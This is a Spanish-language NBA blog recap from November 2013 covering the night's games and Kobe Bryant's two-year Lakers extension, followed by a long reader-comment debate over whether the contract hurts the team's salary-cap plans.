La Crónica: Kobe renueva

26 de November de 2013 por Simon

A pesar de los 9 partidos que se disputaron ayer en la NBA las dos noticias más destacadas del día en la liga llegaron de dos jugadores que no pisaron la cancha. En primer lugar la confirmación oficial de que Derrick Rose se va a perder lo que resta de campaña, lo que supondrá su segunda temporada prácticamente en blanco. Pero la que realmente fue la noticia del día fue la extensión de contrato de Kobe Bryant, no por el hecho de que renovara, cosa cantada, pero sí por los aproximadamente 48 millones de dólares por dos años que le han firmado los Lakers a pesar de sus 35 años y aún no haber vuelto a la acción después de romperse el tendón de Aquiles. Si cumple su contrato, que damos por hecho que sí, Kobe habrá jugado 20 temporadas consecutivas en la misma franquicia. ¿Le han pagado demasiado los Lakers a Kobe teniendo en cuenta su edad y que sale de una grave lesión?

Centrándonos en el aspecto meramente deportivo, el partido más interesante de la jornada era la visita de los Timberwolves a los líderes de la liga, los Indiana Pacers. Los Wolves lograron aguantar los tres primeros cuartos del partido pero como hacen los grandes equipos, los Pacers elevaron su nivel de juego en el último cuarto logrando una victoria cómoda (84-98). En el quinteto de Indiana ayer le tocó compartir estrellato con Paul George al base George Hill que anotó 26 puntos con una gran serie de tiro. Los Wolves suman con esta derrota la quinta consecutiva contra equipos de Play Off y además, por primera vez esta campaña, se ven fuera de los mismos. Tendrán que mejorar si quieren estar peleando por el título en abril. Persiguiendo a los Pacers en el Este marchan los actuales campeones, Miami Heat, que tras comprobar como se marchaba Indiana en la clasificación han puesto el modo apisonadora y con la victoria de anoche ante Phoenix Suns suman su séptima consecutiva. Ayer no dieron ni una opción a los Suns. El partido siguió un guión prácticamente idéntico al de Indiana. Durante los tres primeros cuartos los Suns aguantaron a unos Heat que no apretaban todo lo que podían hasta que en el último cuarto los campeones elevaron su juego para no pasar apuros y certificar la victoria (92-107)

Y si intratables se muestran los líderes del Este qué decir de los líderes del Oeste. Tanto San Antonio como Portland sumaron ayer su undécima victoria consecutiva. Ambos lo hicieron sin pasar el más mínimo apuro, sacando a sus rivales de rueda en la primera mitad y dedicándose a disfrutar de su buen momento de juego durante la segunda. De los titulares de San Antonio ninguno superó los 25 minutos de juego lo que da idea de la escasa resistencia que ofrecieron los jóvenes Pelicans en los que Anthony Davis estuvo toda la noche prácticamente desaparecido (93-112).  Si los Pelicans aguantaron hasta el segundo cuarto, los Knicks no aguantaron ni eso. El partido en el Moda Center entre los Knicks y los Trail Blazers apenas duró 12 minutos. A pesar de que en la segunda mitad hubo algunos momentos en los que parecía que Knicks se podía acercar en el marcador, fueron meros espejismos pues Portland  devolvía siempre las cosas a su sitio enseguida gracias, como siempre, al gran rendimiento de su quinteto titular (91-102).

Además de ver en acción a los 4 mejores equipos de la competición hasta la fecha, la jornada aún tenía varios partidos con mucho aliciente, especialmente dos encuentros entre aspirantes a Play Off del Oeste que en ambos casos se resolvieron a favor del equipo visitante. Importante victoria para Houston Rockets la que lograron ayer ante Memphis Grizzlies. Todo parecía a favor de Memphis durante los tres primeros cuartos ya que se estaba jugando un partido en el que mandaban las defensas, a ritmo lento y baja anotación, pero la historia cambió en el último cuarto. A Houston comenzaron a entrarle los triples, a poder correr y a conseguir canastas fáciles lo que desembocó en 38 puntos que dieron la vuelta a la tortilla y certificaron su victoria ante un rival directo (93-86). Otro equipo que se suma a la pelea por los Play Off son los Denver Nuggets. A pesar de su ya clásico mal inicio de temporada ya están ahí metidos alcanzando el 50% por primera vez esta campaña gracias a la gran victoria que se llevaron del pabellón de los Dallas Mavericks. Los Nuggets, a pesar de ser el equipo visitante, impusieron su estilo de posesiones rápidas y ritmo alto y pronto tuvieron el marcador a favor, algo que supieron administrar a la perfección capitaneados por Ty Lawson y un JJ Hickson que desde la lesión de McGee ha encontrado su sitio como pívot del equipo y está rindiendo a un nivel espectacular (110-96).

En el resto de la jornada, Boston venció a domicilio a Charlotte  (96-86) con Gerald Wallace y Jordan Crawford como hombres más destacados. Detroit pasó por encima de Milwaukee Bucks (94-113) en un partido en el que los Pistons se marcharon al descanso ganando por 29. Y para terminar la jornada, unos deprimidos Bulls cayeron ante Utah en la prórroga a pesar del buen partido de sus tres jugadores principales ahora que no está Rose (83-89).

PREMIOS

MVP: Nueva exhibición de Lebron James. El de Miami se ha ido para casa con 35 puntos (11 de 14 en TC), 5 rebotes y 4 asistencias. Su compañero Dwyane Wade no se ha quedado muy atrás con 21 puntos (9 de 13 en TC), 6 rebotes y 12 asistencias.

Rookie: En la hecatombe que suponen los Bucks, Nate Wolters sigue siendo un rayo de luz. Ya no es titular pero ayer anotó 8 puntos y repartió 3 asistencias en 17 minutos, mejor que muchos de sus compañeros. Su rival anoche, Kentavious Caldwell-Pope, anotó 14 puntos y robó un par de balones. Trey Burke disfrutó de su primera victoria con los Jazz en la que él participó con 14 puntos, 6 rebotes y 4 asistencias. Eso sí, mejor no fijarnos en el porcentaje de tiro ni en las pérdidas.

Sorpresa: Ganó Indiana y el mejor no fue Paul George, que también jugó un buen partido, sinó George Hill. Acabó el partido con 26 puntos (9 de 13), 7 asistencias y 5 robos.

Decepción: Ante los Spurs Eric Gordon sólo jugó 19 minutos pero le dio tiempo para fallar 7 de sus 9 tiros y perder 4 balones. Chris Bosh también acabó con un 2-9 y sólo capturó 4 rebotes. Iman Shumpert se fue a casa sin anotar un solo punto mientras que Corey Brewer perdió 6 balones y falló 9 de sus 12 lanzamientos.

Esfuerzo en vano: Carmelo Anthony sigue luchando contra los elementos y contra buena parte de sus compañeros. Los Knicks acumularon la sexta derrota consecutiva a pesar de sus 34 puntos y 15 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

37 comentarios a esta entrada

  1. txusma dice:
    #1

    Permitidme que continúes aquí la conversación sobre la renovación de Kobe. Yo tb creo que no hacía falta firmarle por 24kilos año. Primero podemos empezar a reflexionar si se los va a ganar. Yo creo q sí pq desde Jordan no ha existido otro jugador con semejante instinto ganador y capacidad de superación. Si firma por ese dinero es porque desde el equipo le ven plenamente recuperado.
    Ahora lo q podemos discutir es si, mirándolo desde un punto de vista más global, hacia falta. Esta renovación directamente significa que Gasol no renovará, más q nada pq no creo q el español vaya a aceptar una rebaja importante para quedarse al lado de un jugador que no lo ha hecho. Gasol se merece cobrar mínimo 10-12 kilos sí o sí y si no es en los Lakers lo hará en otro sitio. Para el año q viene tienen comprometidos unos 34 kilos y el límite salarial supongo estará por los 59M. Tiene pasta para fichar al agente libre que les de la gana. Carmelo, Lebron, Wade y Bosh pueden decidir salir al mercado. Alguno de estos querrá ir a jugar con Kobe? Cobrarían unos 18 kilos digo yo. De segunda fila están Gay, Deng, Pierce, Marion, Granger, RAndolph y tios como Duncan o Nowitzki que no me imagino en los Lakers. Yo es q no veo claro cuales pueden ser los movimientos que harán los Lakers ahora mismo ni que agentes libres pueden tener como objetivo.

      Citar

  2. Denise dice:
    #2

    Es que ahora mismo Pau debe ser el primero que no querrá renovar por los Lakers.
    Suponiendo que le ofreciesen 10 millones, el catalan debe ser lo suficientemente inteligente como para saber que con Kobe, Nash, él mismo y unos 15-20 millones que quedarían para fichar ó renovar, no se puede hacer un equipo con aspiraciones al anillo. Tendrían que traer practicamente a 7-8 tios utiles y decentes por unos 2 millones de dolares de media cada uno y eso, a estas alturas creo que no lo pueden conseguir ni aunque el GM fuese Dynamo el Mago.

    Si Pau sale al mercado de agentes libres, ojo que los Spurs tienen espacio para ficharle con los 8 kilos que sueltan entre Diaw y Bonner.
    Si Randolph no ejecutase su player option, tambien sería posible que volviese a Memphis y hacer un tandem con su hermano en la pintura.
    En el Este, Atlanta podría ficharlo tambien y traspasar a Millsap por un SG-SF y no le quedaría mal equipo.

      Citar

  3. Denise dice:
    #3

    En los rookies tambien destacaría hoy a Gobert con 9 rebotes en 20 minutos. El frances esta verde como una lechuga, pero es un diamante en bruto y un tipo muy a tener en cuenta en los proximos años.

      Citar

  4. sempren dice:
    #4

    De todos modos, el partido de Paul George también valdría para el MVP, con o sin George Hill, porque metió los mismos 26 puntos, 4/4 en triples, 8 rebotes, 4 asistencias y 4 robos, más un tapón. Le penalizan las pérdidas, pero aún así, numerazos de crack

      Citar

  5. diestro dice:
    #5

    Derrick Williams por Luc Mbah a Moute??

      Citar

  6. Blade Petrovic dice:
    #6

    Yo creo que como muchos twitteros afirman se quiere traer a Love e Irving( Kobe no ha jugado aún con un gran base) además estos firmarían por el máximo asi que que jugador de banquillo querrá fichar por el mínimo( jugadores normalitos tipo DJ Augustin hace dos años) para completar el roster, yo veo que los Lakers se han hipotecado mucho mucho.
    Pd: si alguien tiene twitter podría darlo (@miquelBIW)

      Citar

  7. Viva_Dirk dice:
    #7

    Yo creo, como dice un gran lakeriano que conozco, que la mejora de los Lakers debe llegar via trade, mas allá de FA que llegue en verano. Pau debe salir de los Lakers esta misma temporada, hay varios equipos con aspiraciones que necesitan un anotador al poste y podrian dar piezas válidas, Denver, New Orleans, Wizars o Sixers por ejemplo.

      Citar

  8. Viva_Dirk dice:
    #8

    Y hablando de lo puramente deportivo, los Wolves creo que aciertan con el traspaso, aunque a pelo parece algo pobre. Mbah les va a dar minutos de mucha intensidad y defensa que lo necesitan a raudales. Y para terminar de ser un equipo realmente competitivo necesitan intimidación interior visto que no confian nada en Dieng.

    Ayer George Hill penetró una y otra vez, cuando los exteriores rivales rebasan en uno contra uno no hay nadie que los frene, no hay ayudas y no digamos segundas ayudas. Compiten bien porque son uno de los equipos con mas IQ de la liga, pero físicamente estan muy lejos de ciertos equipos. Es algo parecido a lo que les pasa a los Mavs, pero estos al menos si tienen algunas piezas que compensan tanto para correr(Monta Ellis, Marion) como para defender(Dalembert o Crowder).

      Citar

  9. Viva_Dirk dice:
    #9

    Y sobre Portland, aquí va mi opinión.

    Si encuentran la manera de dosificar algo yo creo que son un pedazo de equipo para una serie a 7 partidos. Si llegan teniendo todos los titulares +35 minutos por noche creo que lo van a tener imposible contra plantillas mas largas y con no menos calidad.

    Respecto a su rendimiento/juego, son muy equilibrados, Lillard es ideal para jugar con Batum&Matthews, necesita la pelota y ellos no, es muy bueno en el uno contra uno y asume con total naturalidad galones en ataque, no está tirando bien pero si es muy incisivo. La pareja de antes puede ser la mas completa de la liga en cuanto a escolta-alero, buenos defensores, capaces de anotar de 3 y de atacar el aro con decisión, Matthews está rindiendo a un 120% de sus posibilidades eso si, si este es su nivel le da un buen salto al equipo; Batum está en pleno crecimiento, si además de ser lo bueno que es, explota todo su físico es un jugador total. LaMarcus está en el momento cumbre de su carrera, no se puede decir que halla ningun PF mejor que el en la actualidad, vale que Love hace mejores números y tal, pero Aldridge esta temporada esta defendiendo(no es un titán pero ya no se aparta, jojo) y en ataque tiene todos los recursos. Robin Lopez me horroriza pero cumple muy bien la verdad, se faja con quien toque y pelea cada balón, pero este si es el tipo de jugador que me despierta enormes dudas para playoffs.

    En el banco Mo Williams ha supuesto una gran mejora, Robinson aporta intensidad pero deberia dar mas, y Freeland cumple. Gran decepción para mi D.Wright, espero mucho mas de el.

    Vamos que creo que sanos y sin llegar fundidos pelean la conferencia. Su techo va a depender de lo máximo que puedan dar Lillard y Batum, el resto creo que son los jugadore que son.

      Citar

  10. Denise dice:
    #10

    Viva_Dirk:
    Yo creo, como dice un gran lakeriano que conozco, que la mejora de los Lakers debe llegar via trade, mas allá de FA que llegue en verano. Pau debe salir de los Lakers esta misma temporada, hay varios equipos con aspiraciones que necesitan un anotador al poste y podrian dar piezas válidas, Denver, New Orleans, Wizars o Sixers por ejemplo.

    De esos equipos que hablas, lo unico que se me ocurre es Gasol por Nene via sign and trade, porque si las piezas de las que hablas son Faried, Ryan Anderson ó Thadeus Young / Evan Turner creo que Gasol ahora mismo vale menos que esos jugadores, ya no solo para la proxima campaña sino pensando en el 2016 ó 2017 que es cuando probablemente acabe su nuevo contrato.

      Citar

  11. Blade Petrovic dice:
    #11

    Ojito al rumor que dice que Turner a Cavs por Waiters, creo que Turner se convierte en FA y si este no quiere quedarse en Philadelphia( no veo descartable que acabe en Bulls si Deng no renueva) si que ejecutaia el traspaso por parte de 76ers, aunque ahora mismo Turner está mucho mejor que Waiters.El traspaso puede beneficiar a los dos(Cavs consiguen a un SG que se lleve bien con Kyrie y los Sixers consiguen relevo para SG).Yo solo ejecutaría el trade si estoy seguro de que Turner no renueva

      Citar

  12. HisRoyalAirness dice:
    #12

    Kobe ha preferido la pasta a los anillos. Quiero recordar que Duncan renovó por 10 y ahí están todos los años

      Citar

  13. txusma dice:
    #13

    Viva_Dirk:
    Y hablando de lo puramente deportivo, los Wolves creo que aciertan con el traspaso, aunque a pelo parece algo pobre. Mbah les va a dar minutos de mucha intensidad y defensa que lo necesitan a raudales. Y para terminar de ser un equipo realmente competitivo necesitan intimidación interior visto que no confian nada en Dieng.

    Ayer George Hill penetró una y otra vez, cuando los exteriores rivales rebasan en uno contra uno no hay nadie que los frene, no hay ayudas y no digamos segundas ayudas. Compiten bien porque son uno de los equipos con mas IQ de la liga, pero físicamente estan muy lejos de ciertos equipos. Es algo parecido a lo que les pasa a los Mavs, pero estos al menos si tienen algunas piezas que compensan tanto para correr(Monta Ellis, Marion) como para defender(Dalembert o Crowder).

    Jugarán Corey Brewer y Mbah juntos? Y esperemos que el traspaso no se ha cerrado pq las rodillas del camerunés están algo trinchadas.

      Citar

  14. HisRoyalAirness dice:
    #14

    Y lo de Derrick Williams me parece una mierda de trade, sinceramente

      Citar

  15. rumbero dice:
    #15

    Blade Petrovic:
    Yo creo que como muchos twitteros afirman se quiere traer a Love e Irving( Kobe no ha jugado aún con un gran base) además estos firmarían por el máximo asi que que jugador de banquillo querrá fichar por el mínimo( jugadores normalitos tipo DJ Augustin hace dos años) para completar el roster, yo veo que los Lakers se han hipotecado mucho mucho.
    Pd: si alguien tiene twitter podría darlo (@miquelBIW)

    Pero es que esa opción con Kobe en el equipo implica “perder” la temporada que viene ya que esto sería para la 15/16, teniendo en cuenta además que Irving va a ser agente libre restringido y que pueden pasar muchas cosas. Como sueño húmedo está muy bien pero no se yo si es tan viable. Igual es más factible traerse a Deng y dependiendo de como vayan las cosa en Memphis tentar a Z-Bo. Pero por decir algo. Como txusma, no veo a los grandes nombres rebajándose el sueldo para ir al equipo de Kobe que con su nuevo contrato ha dejado claro quien manda en LA. A ver como vuelve de la lesión y como se mueven porque para mi es toda una incógnita la verdad

      Citar

  16. GreenPride dice:
    #16

    Bueno pues noticias varias.
    La primera que poco a poco nos vamos quedando sin los equipos punteros de la conferencia Este. Una vez confirmada la baja para toda la temporada de Rose y viendo jugar a Knicks y Nets parece que de nuevo la conferencia Este va a quedar en un mano a mano entre los enrachadísimos Pacers y los campeones Heat. Es muy pronto pero parece difícil que algún equipo pueda hacerles sombra una vez llegada la hora de la verdad. Esperemos que no haya más lesiones importantes.
    Ayer los Pacers ganaron cómo y cuando quisieron a los Wolves y es que la mejor defensa puso tierra de por medio ante un equipo que defiende más bien nada como Minny. Ricky va haciendo all-stars (vale lo de CP3 pero que te destrocen Aaron Brooks y George Hill ya no cuela) y además no le ayuda la nefasta defensa de pick&roll de su equipo. Por lo demás muchos triples y poco orden ante un equipo tan bien entrenado y tan enrachado como los Pacers con un Paul George que definitivamente ya es un estrellón en esta liga.
    También tuve oportunidad de ver cómo los Spurs hicieron añicos a los Pelicans como padres jugando con sus niños pequeños. Qué superioridad y saber hacer de un equipo que no está necesitando practicamente exprimir a ninguno de sus titulares para tener el mejor record de la liga junto a Indiana.
    La renovación de Kobe. Está claro que ha imperado la pasta ante su último gran contrato que el intentar el asalto a un sexto anillo. Ahora los Lakers siguen optando a algún agente libre de relumbrón pero dada la cagada cometida con Nash parece muy complicado que puedan reunir un equipo para meterse en la lucha. Yo iría a por un tres completo y un interior decente (Z-Bo?) pero veo complicado juntar mibres para aspirar al anillo.

      Citar

  17. HisRoyalAirness dice:
    #17

    Que Ricky defiende mal? Joder…

      Citar

  18. futurman dice:
    #18

    Si no recuerdo mal, a Hill le defendió Martin muchísimo rato…

    De todos modos, el principal problema es que por muy bien que defiendan dos, este es un juego de 5.

      Citar

  19. Esteban dice:
    #19

    bueno los kings si que se estan moviendo bien dentro de sus posibilidades

    sacarse de encima a evans y sus delirios de estrella pro un base necesario como vasquez me parecio una jugada fenomenal, y ahora logran hacerse de un derrick williams a cambio de moute que no hacia nada en los kings

    williams tiene un techo bastante alto y en los kins tendra los tiros y los minutoa que nunca logro en minesota

    ahora hay que esperar a que McLemore sea la mitad de bueno de lo que alguna vez se dijo que seria, y un equipo sin futuro, comienza a verse de forma diferente

      Citar

  20. Denise dice:
    #20

    Esteban:
    bueno los kings si que se estan moviendo bien dentro de sus posibilidades

    sacarse de encima a evans y sus delirios de estrella pro un base necesario como vasquez me parecio una jugada fenomenal, y ahora logran hacerse de un derrick williams a cambio de moute que no hacia nada en los kings

    williams tiene un techo bastante alto y en los kins tendra los tiros y los minutoa que nunca logro en minesota

    ahora hay que esperar a que McLemore sea la mitad de bueno de lo que alguna vez se dijo que seria, y un equipo sin futuro, comienza a verse de forma diferente

    A mi Derrick Williams me parece una calamidad de jugador. Solo vale en determinados momentos de revulsivo para jugar a campo abierto y mandarle dos o tres alley-opps y que se cuelgue del aro. Es lo unico que sabe hacer, porque en estatico es un cero a la izquierda, no tiene movimientos dentro y cualquier alero LEB tiene mas tiro exterior que él. Y atrás tampoco me parece un correcto defensor Un fracaso de jugador en toda regla.

    Vasques está jugando la mitad de bien que el año pasado en NOR y este año acaba contrato y se irá a asegurar su vida, es decir al equipo que mas pasta le ofrezca por lo que no creo que le quede mucho tiempo en los Kings, que con la subida salarial de Cousins de 4 a 13 kilos ya estan por encima del limite.

    Dentro de que es un traspaso entre morrallas, declaro ganador a los Wolves que al menos se llevan a un jugador trabajador, no egoista y que los minutos que juegue va a mostrar la mayor intensidad defensiva posible.
    Otra cagada mas de los Kings y ya van…

      Citar

  21. Esteban dice:
    #21

    bueno siento disentir, pero williams no es tan malo, y creo que en los kings puede funcionar

    si el entrenador de los kings lo convence de que vuelva a jugar de 4, incluso hasta puede funcionar muy bien

      Citar

  22. Viva_Dirk dice:
    #22

    Duncan renovó por 10 kilos para SEGUIR teniendo un equipo que estaba arriba. Nada garantiza a Kobe que cobrar menos dinero le ponga un equipo para aspirar al anillo.

      Citar

  23. Esteban dice:
    #23

    lo de kobe es altamente cuestionable por el hecho de que se esperaba que renovase por menos dinero para tener un mejor equipo

    pero viendo el nivel de kobe del año pasado, el dinero esta bien, pensar que promedio 28 puntos, otras tantas asitencias y una buen porcentaje de campo, vale ese dinero sin dudas

    ahora lo que esta en duda, es como haran los lakers con ese contrato y el de nash para rodearlos lo suficientemente bien para ser aspirantes…

      Citar

  24. Viva_Dirk dice:
    #24

    Denise: De esos equipos que hablas, lo unico que se me ocurre es Gasol por Nene via sign and trade, porque si las piezas de las que hablas son Faried, Ryan Anderson ó Thadeus Young / Evan Turner creo que Gasol ahora mismo vale menos que esos jugadores, ya no solo para la proxima campaña sino pensando en el 2016 ó 2017 que es cuando probablemente acabe su nuevo contrato.

    Pienso que sobre todo a Denver le vendria de perlas cambiarlo por Hickson o por Faried. Puede que a nivel global Pau valga menos, pero sin duda a Denver le hace mejor equipo. Eso si, para completarlo dudo que Lakers tragase con llevarse a McGee.

      Citar

  25. Vader dice:
    #25

    Pau se tendria que ir a Miami, allí si que la liaria y seria la piezza perfecta para ganar un par de anillos más.

    Saludos

      Citar

  26. txusma dice:
    #26

    Esteban:
    bueno siento disentir, pero williams no es tan malo, y creo que en los kings puede funcionar

    si el entrenador de los kings lo convence de que vuelva a jugar de 4, incluso hasta puede funcionar muy bien

    Ayer mismo leí que lo querían poner de 3… En esa posición tienen a Salmons y Outlaw y como 4 a Jason Thompson, Patrick Patterson y alguno más. Irá alternando pero saldrá de 3.
    Lo de Derrick Williams es algo increible pq en la universidad las enchufaba de fuera que daba gusto.

      Citar

  27. rumbero dice:
    #27

    Viva_Dirk:
    Duncan renovó por 10 kilos para SEGUIR teniendo un equipo que estaba arriba. Nada garantiza a Kobe que cobrar menos dinero le ponga un equipo para aspirar al anillo.

    No te garantiza nada, pero con 10 millones más de margen se pueden intentar más cosas, eso seguro. Luego ya el ojo que tengan es otra cosa. Lo peor para mí es el mensaje que se desprende de esta renovación: Mala gestión por parte de Lakers y el escaso sacrificio por parte de Kobe (y con esto no digo que no merezca lo que va a cobrar por todo lo que ha dado y puede dar)

      Citar

  28. TheDeerHunter dice:
    #28

    Como aficionado de Lakers me parece incomprensible que se insinúe siquiera que se le debe escamotear nada a Kobe Bryant, el segundo mejor jugador de la historia de la franquicia y un top10 de todos los tiempos. Estamos hablando de un contrato de 2 años, por una cantidad que hasta ahora Kobe la ha valido con creces como indiscutible mejor jugador del equipo y como uno de los 5 o 6 mejores de toda la liga.
    Suponiendo que Kobe no fuera a valer ni para tacos de escopeta había que renovarle y había que tenerlo lo más contento posible, y repito que son sólo dos años de contrato.
    Se trata una obligación moral de una franquicia que aspira a ser muy grande en esta liga, por este tipo de cosas.

    Apuesto a que cualquier verdadero aficionado amarillo prefiere 5 años sin anillos (que ninguna otra opción garantiza nada) que ver a Kobe salir por la puerta de atrás. Eso sí sería para lamentarse (y no quiero ni pensar verle con otras camisetas, o peor aún… verle rendir bien con otras camisetas)

    Podemos especular a que Kobe, a su edad y tras esta lesión no vale 24 millones/año. Pero simplemente es eso… especulación. Hasta ahora él no ha dado nunca motivos para ser devaluado… más allá de tirrias.

      Citar

  29. Denise dice:
    #29

    TheDeerHunter:

    Se trata una obligación moral de una franquicia que aspira a ser muy grande en esta liga, por este tipo de cosas.

    ¿Ahora los Lakers tienen obligaciones morales?? Recuerdo que hace poco traspasaron a Derek Fisher por Jordan Hill cuando al pescador solo le restaban 3 meses de contrato, abandonando la franqucia a patadas por la puerta de atrás.

    Sobre Kobe, los que nos echamos las manos a la cabeza sobre esta renovación, lo decimo porque ni Kobe ni los Lakers han firmado ese contrato por razones deportivas.
    Desde las oficinas, supongo que para los Buss habran echado cuentas y habran calculado que le saldrá rentable por merchandising, televisiones y demas pagarle 25 kilos a Kobe cuyo rendimiento es una incognita y tener un equipo mierdoso que es lo que, si hay transparencia en las negociaciones con otros equipos, van a tener.

    Y Kobe, ese que se las da de ser tan competitivo, y querer siempre ganar, aqui se le ha visto el plumero y como dice el refran de las tetas y las carretas, en este caso tiran mas 50 kilos que luchar por 2 anillos. Os podra gustar mas Kobe o no, podeis ser su fan nº1 ó desterrarlo de los quintetos ideales, pero es incuestionable que ha antepuesto el dinero a la posibilidad de tener un equipo ganador, ha actuado de la forma mas egocentrica posible.

    Deer, siguiendo con tu comentario, nadie habla de que Kobe tuviera que salir por la puerta de atrás, ó que se le escupiese a la cara, pero con un contrato de 15 kilos bastaba. Y como conclusion, mis adjetivos calificativos para Kupchak y Bass es pésima planificación deportiva, y para Kobe, egoista!!! (con tono de Montes a Gordan Giricek)

      Citar

  30. TheDeerHunter dice:
    #30

    Por partes…
    1) A la mayoría de aficionados Lakers, por no decir a todos, nos fastidió la salida de Fisher. Particularmente ya conoces mi opinión al respecto. Y con todo lo que le admiro, Fisher no es Kobe en importancia para la franquicia y para la historia de la competición… y Fisher ya estuvo un tiempo fuera de Lakers. No son casos ni medio similares.

    2) Que no son razones deportivas es una interpretación tuya. Kobe, al rendimiento del año pasado, se gana una renovación por ese montante sobradamente. La incógnita de lo que será su vuelta ni tú ni yo podemos decir ni una cosa ni la otra. Ante la duda se debe apostar por Kobe… no contemplo otra alternativa.

    3) Kobe es el animal más competitivo de la historia, por encima de Jordan. No se trata de anteponer el dinero a un equipo ganador… se trata de jerarquizar como se debe, para evitar confusiones como la del año pasado y para eso también sirven los contratos. Esos 10 kilos teóricos que tú propones no garantizan una mierda en esta competición y la propuesta esa de 15… tiene tanto fundamento como decir gratis o decir 500 (matizo, no es una crítica a tu comentario, sino que no parece trivial cuantificar su valor)

    4) Estoy convencido a que Kobe, si se hubiera empeñado, fácilmente hubiera firmado 3 años. Apostaría a que otras franquicias se lo hubieran firmado gustosamente. Suerte que no se dará el caso. Eso también es “perdonar”.

      Citar

  31. Denise dice:
    #31

    TheDeerHunter:

    2) Que no son razones deportivas es una interpretación tuya. Kobe, al rendimiento del año pasado, se gana una renovación por ese montante sobradamente. La incógnita de lo que será su vuelta ni tú ni yo podemos decir ni una cosa ni la otra. Ante la duda se debe apostar por Kobe… no contemplo otra alternativa.

    3) Kobe es el animal más competitivo de la historia, por encima de Jordan. No se trata de anteponer el dinero a un equipo ganador… se trata de jerarquizar como se debe, para evitar confusiones como la del año pasado y para eso también sirven los contratos. Esos 10 kilos teóricos que tú propones no garantizan una mierda en esta competición y la propuesta esa de 15… tiene tanto fundamento como decir gratis o decir 500 (matizo, no es una crítica a tu comentario, sino que no parece trivial cuantificar su valor)

    Respecto al punto 2..cuando digo que el contrato no obedece a razones deportivas no me refiero a que Kobe con su rendimiento no lo merezca. Hizo un temporadon, pero es que las situaciones que pasan y el contexto de que ha sufrido una lesion gravisima y aun no ha jugado no se puede pasar por alto por muy nivel MVP al que jugase este año.

    Y sobre el punto 3, tio, con lo que sabes de baloncesto, no entiendo como puedes no ver el valor que tendrían esos 10 kilos de rebaja en el salario para construir un equipo ganador.
    Sabes de sobra el poder de atracción que tiene Lakers como organización y Los Ángeles como ciudad, y hay muchos agentes libres dipuestos a renunciar a dinero por jugar en Lakers, ya que hasta ese dinero que pierden luego lo amortizan ganando mas en anuncios y publicidad. Ese margen daría para fichar a Melo que debe estar loco por salir de los Knicks e incluso lanzarte por Randolph ó por 2 jugadores de nivel medio-alto tipo Bledsoe, Gortat ó Granger.
    Ademas esa rebaja de sueldo simbolizaría las ganas de Kobe por conseguir mas anillos y propiciaría la llegada de agentes libres de calidad para unirse a él. Ademas, como sabeis los Lakers solo tienen a Nash y a Kobe firmados para el año que viene, teniendo que completar 11-12 fichas. Si Kobe se baja el sueldo, esto hubiese sido un ejemplo para tios como Farmar, Young Meeks ó Henry que lo están haciendo muy bien y un estimulo para que quieran seguir en los Lakers, y a lo mejor por 2- 2’5 kilos hubiesen aceptado la renovación. Pero ahora, tras ver que a Kobe le sueltan 25 encima de la mesa, cuando Kupchak le ofrezca a estos tios menos de 3 kilos, se van a acordar de su madre.
    Como digo, si confiamos en la honestidad y en la transparencia de las franquicias a la hora de fichar, no sé que jugadores de nivel medio de esos que te hacen falta para completar la plantilla y tener banquillo van a querer irse a Lakers a cobrar una miseria mientras el señorito Kobe ocupa el 45% del espacio salarial.

      Citar

  32. TheDeerHunter dice:
    #32

    Lo primero que ha dicho Melo al oir la renovación de Kobe es que es una miseria, con esto te lo digo todo…

    A ver, yo sí veo el valor de 10 millones de dólares pero aquí parece que se está vendiendo que son el eje sobre el que llegar al anillo. Yo digo que nada garantiza nada, que lo que es una putada para los Lakers es que estamos ante el final de la era Kobe y eso no hay nada que lo arregle. La tragedia no es que cobre 24 kilos al año, la tragedia es que pronto ya no los cobrará.

    Yo he hablado como aficionado Laker, ni como GM ni como agente del jugador. Creo que la mayoría tenemos claro que el objetivo anillo ya no pasa por las manos de nadie en L.A. a corto plazo, pero lo que sí hubiera sido un error histórico es que no se hubiera firmado ese contrato. Como dijo Kupchack fue un día feliz para los aficionados amarillos.

    Por otro lado y llevando al extremo el argumento se me ocurre que, todos los que han ganado mucho dinero estos años y terminan contrato deberían rebajarse el sueldo… ¿Qué demonios? jugar gratis para L.A. el año que viene junto a Kobe (también gratis) Pongamos un Dirk, Pierce, Deng, Bogut, Granger, Lowry… y terminaran ganando el anillo ¿Cómo valoraríamos eso? Yo sí tengo mi opinión.

      Citar

  33. Denise dice:
    #33

    TheDeerHunter:

    Por otro lado y llevando al extremo el argumento se me ocurre que, todos los que han ganado mucho dinero estos años y terminan contrato deberían rebajarse el sueldo… ¿Qué demonios? jugar gratis para L.A. el año que viene junto a Kobe (también gratis) Pongamos un Dirk, Pierce, Deng, Bogut, Granger, Lowry… y terminaran ganando el anillo ¿Cómo valoraríamos eso? Yo sí tengo mi opinión.

    Nadie ha hablado sobre Kobe ú otro jugador de jugar gratis. Cobrar 15 kilos que es el tope que yo le habria ofrecido no es moco de pavo ni mucho menos.
    Lo que si es normal y nada reprochable es que por ejemplo Lowry tenga una oferta de los Nuggets por 7 kilos y otra de Lakers por 5, y probablemente se decidiese por L.A, por la ciudad, el prestigio de jugar en la franquicia californiana y porque los dos kilos de diferencia los va a compensar con todo el dinero que ganaría de mas en Lakers que en Nuggets por lo referente a marketing y publicidad.
    De los nombres que me indicas, veria totalmente logico que Dirk pasase de cobrar 22 a 12 kilos. Primero porque ya no tiene el horno para muchos bollos y segundo porque con ese margen Cuban puede rodearlo muy bien.
    Pierce ya no está para exigir nada y debería quedarse en los Nets ó fichar sin demasiadas pretensiones economicas por una franquicia ganadora a corto plazo. Y Deng, Granger y Lowry todavia son jovenes y deberían irse al que mas pasta le ofrezca, aunque como digo en el parrafo anterior, si algun gallo actual de la liga le ofrece un poquito menos de dinero que la mejor oferta que tengan, ahí es donde deberian irse.
    Bogut esta ya renovado por los Warriors.

      Citar

  34. TheDeerHunter dice:
    #34

    No me has contestado a mi pregunta, Denise, ¿no sería apestosísimo juntar un super-equipo para directamente adulterar la competición en esos términos?

    Pero te lanzo otra.
    ¿Exáctamente porqué 15 y no 10 o 5? ¿Cómo llegas a esa cifra? ¿y año a año o cuantos años de contrato?

      Citar

  35. Denise dice:
    #35

    TheDeerHunter:
    No me has contestado a mi pregunta, Denise, ¿no sería apestosísimo juntar un super-equipo para directamente adulterar la competición en esos términos?

    Pero te lanzo otra.
    ¿Exáctamente porqué 15 y no 10 o 5? ¿Cómo llegas a esa cifra? ¿y año a año o cuantos años de contrato?

